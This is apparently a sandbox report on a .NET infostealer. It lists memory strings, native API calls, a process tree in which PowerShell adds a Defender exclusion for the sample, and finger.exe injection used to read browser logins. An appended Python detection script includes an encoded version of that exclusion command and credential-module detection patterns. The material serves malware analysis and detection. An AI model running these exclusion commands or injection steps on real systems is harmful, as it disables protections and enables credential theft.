                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000007.00000002.3340993158.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000002B26000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 0000000A.00000003.1203352382.00000266E42C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000007.00000003.1255366123.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033)
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 00000007.00000002.3337828652.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: oss4CtI8oz.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                Source: finger.exe, 00000007.00000003.1272135187.0000000007B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: finger.exe, 00000007.00000002.3340993158.0000000004FCE000.00000004.10000000.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000002.3340314357.0000000003DFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.star.ne.jp/

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042CE23 NtClose,4_2_0042CE23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392B60 NtClose,LdrInitializeThunk,4_2_01392B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01392DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01392C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013935C0 NtCreateMutant,LdrInitializeThunk,4_2_013935C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01394340 NtSetContextThread,4_2_01394340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01394650 NtSuspendThread,4_2_01394650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BA0 NtEnumerateValueKey,4_2_01392BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392B80 NtQueryInformationFile,4_2_01392B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BF0 NtAllocateVirtualMemory,4_2_01392BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392BE0 NtQueryValueKey,4_2_01392BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AB0 NtWaitForSingleObject,4_2_01392AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AF0 NtWriteFile,4_2_01392AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392AD0 NtReadFile,4_2_01392AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D30 NtUnmapViewOfSection,4_2_01392D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D10 NtMapViewOfSection,4_2_01392D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392D00 NtSetInformationFile,4_2_01392D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DB0 NtEnumerateKey,4_2_01392DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392DD0 NtDelayExecution,4_2_01392DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C00 NtQueryInformationProcess,4_2_01392C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392C60 NtCreateKey,4_2_01392C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CA0 NtQueryInformationToken,4_2_01392CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CF0 NtOpenProcess,4_2_01392CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392CC0 NtQueryVirtualMemory,4_2_01392CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F30 NtCreateSection,4_2_01392F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F60 NtCreateProcessEx,4_2_01392F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FB0 NtResumeThread,4_2_01392FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FA0 NtQuerySection,4_2_01392FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392F90 NtProtectVirtualMemory,4_2_01392F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392FE0 NtCreateFile,4_2_01392FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392E30 NtWriteVirtualMemory,4_2_01392E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392EA0 NtAdjustPrivilegesToken,4_2_01392EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392E80 NtReadVirtualMemory,4_2_01392E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392EE0 NtQueueApcThread,4_2_01392EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393010 NtOpenDirectoryObject,4_2_01393010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393090 NtSetValueKey,4_2_01393090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013939B0 NtGetContextThread,4_2_013939B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393D10 NtOpenProcessToken,4_2_01393D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01393D70 NtOpenThread,4_2_01393D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_00879790 NtCreateFile,7_2_00879790
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_00879900 NtReadFile,7_2_00879900
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_00879AB0 NtClose,7_2_00879AB0
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_00879A00 NtDeleteFile,7_2_00879A00
                Source: C:\Windows\SysWOW64\finger.exe | Code function: 7_2_00879C10 NtAllocateVirtualMemory,7_2_00879C10
                Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 031D7E54 appears 101 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 031C5130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 031FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0317B970 appears 275 times
                Source: C:\Windows\SysWOW64\finger.exe | Code function: String function: 0320F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01395130 appears 57 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0134B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 013A7E54 appears 100 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 013CEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 013DF290 appears 105 times
                Source: oss4CtI8oz.exe | Static PE information: invalid certificate
                Source: oss4CtI8oz.exe, 00000000.00000000.853030195.0000000000853000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameLouH.exe. vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.943349052.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.942384571.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.942384571.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.966088483.0000000007340000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.938830651.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.954042224.0000000007190000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe | Binary or memory string: OriginalFilenameLouH.exe. vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: oss4CtI8oz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/12@19/11
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oss4CtI8oz.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drhw4cly.hbg.ps1
                Source: oss4CtI8oz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: oss4CtI8oz.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: finger.exe, 00000007.00000003.1258102670.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1257140033.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: oss4CtI8oz.exe | Virustotal: Detection: 77%
                Source: oss4CtI8oz.exe | ReversingLabs: Detection: 73%
                Source: unknown | Process created: C:\Users\user\Desktop\oss4CtI8oz.exe "C:\Users\user\Desktop\oss4CtI8oz.exe"
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\oss4CtI8oz.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe | Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\SysWOW64\finger.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
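Added example, not part of the Joe Sandbox report and not vendor code: a small Python triage routine run over process-creation and image-load events constructed to mirror the chain above. It flags the things a detection engineer would key on in this run: a PowerShell Add-MpPreference/Set-MpPreference call that adds an exclusion, including the base64 -EncodedCommand form the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule in this report anticipates; a signed .NET utility (RegSvcs.exe) started by a parent living under C:\Users; finger.exe started by something other than a shell; and a non-browser process loading winsqlite3.dll or vaultcli.dll, which is how the finger.exe stage here reads browser login databases (the password_notes schema above is from Chromium's Login Data) and the Credential Manager. Add-MpPreference is a CDXML cmdlet over the MSFT_MpPreference WMI class, which is why WmiPrvSE.exe loads mpclient.dll in this run. The event field names, rule names and sample events are assumptions for the example, not a real log schema.

```python
"""Rule-based triage of process-creation and image-load events.

Added example (not Joe Sandbox code). The events below are constructed to
mirror the chain in this report: the .NET sample spawns powershell.exe to add
a Defender exclusion, hollows RegSvcs.exe, and the payload's final host is
finger.exe, which loads winsqlite3.dll / vaultcli.dll to read browser and
Credential Manager secrets. Field names are assumptions, not a real log schema.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the new process
    cmdline: str    # its command line
    parent: str     # full path of the parent process


@dataclass(frozen=True)
class ImageLoad:
    image: str      # process that loaded the module
    module: str     # module file name


# signed .NET/SDK utilities commonly used as injection hosts
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
# modules that browsers and credential stores load; anything else loading them is suspect
CRED_MODULES = {"winsqlite3.dll", "vaultcli.dll"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
MPPREF_RE = re.compile(r"(add|set)-mppreference\b.*-exclusion(path|process|extension|ipaddress)", re.I | re.S)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_powershell(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def effective_cmdline(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload decoded in place."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return cmdline
    return cmdline[:m.start()] + decoded + cmdline[m.end():]


def triage_process(ev: ProcEvent) -> List[str]:
    """Apply the three process-creation rules; returns the names of the rules that fired."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent)
    cmd = effective_cmdline(ev.cmdline)
    if img in {"powershell.exe", "pwsh.exe"} and MPPREF_RE.search(cmd):
        hits.append("defender_exclusion_added")
    if img in DOTNET_HOSTS and ev.parent.lower().startswith("c:\\users\\"):
        hits.append("dotnet_host_spawned_from_user_path")
    if img == "finger.exe" and parent not in SHELLS:
        hits.append("finger_spawned_by_non_shell")
    return hits


def triage_loads(loads: List[ImageLoad]) -> Dict[str, List[str]]:
    """Map each non-browser process to the credential-store modules it loaded."""
    out: Dict[str, List[str]] = {}
    for ld in loads:
        if basename(ld.module) in CRED_MODULES and basename(ld.image) not in BROWSERS:
            out.setdefault(basename(ld.image), []).append(basename(ld.module))
    return out


# constructed events modelled on the process tree in this report
SAMPLE = "C:\\Users\\user\\Desktop\\oss4CtI8oz.exe"
PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
REGSVCS = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
FINGER = "C:\\Windows\\SysWOW64\\finger.exe"
DROPPED = "C:\\Program Files (x86)\\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\\DzuG1v7KGGzqI4w.exe"

EVENTS = [
    ProcEvent(PS, f'"{PS}" Add-MpPreference -ExclusionPath "{SAMPLE}"', SAMPLE),
    # same intent, base64-wrapped as the Sigma rule cited in the report anticipates
    ProcEvent(PS, f'"{PS}" -nop -w hidden -enc ' + encode_powershell(f'Add-MpPreference -ExclusionPath "{SAMPLE}"'), SAMPLE),
    ProcEvent(REGSVCS, f'"{REGSVCS}"', SAMPLE),
    ProcEvent(FINGER, f'"{FINGER}"', DROPPED),
    ProcEvent(FINGER, "finger.exe user@host", "C:\\Windows\\System32\\cmd.exe"),  # benign control
]
LOADS = [
    ImageLoad(FINGER, "winsqlite3.dll"),
    ImageLoad(FINGER, "vaultcli.dll"),
    ImageLoad("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "winsqlite3.dll"),  # browser, expected
]


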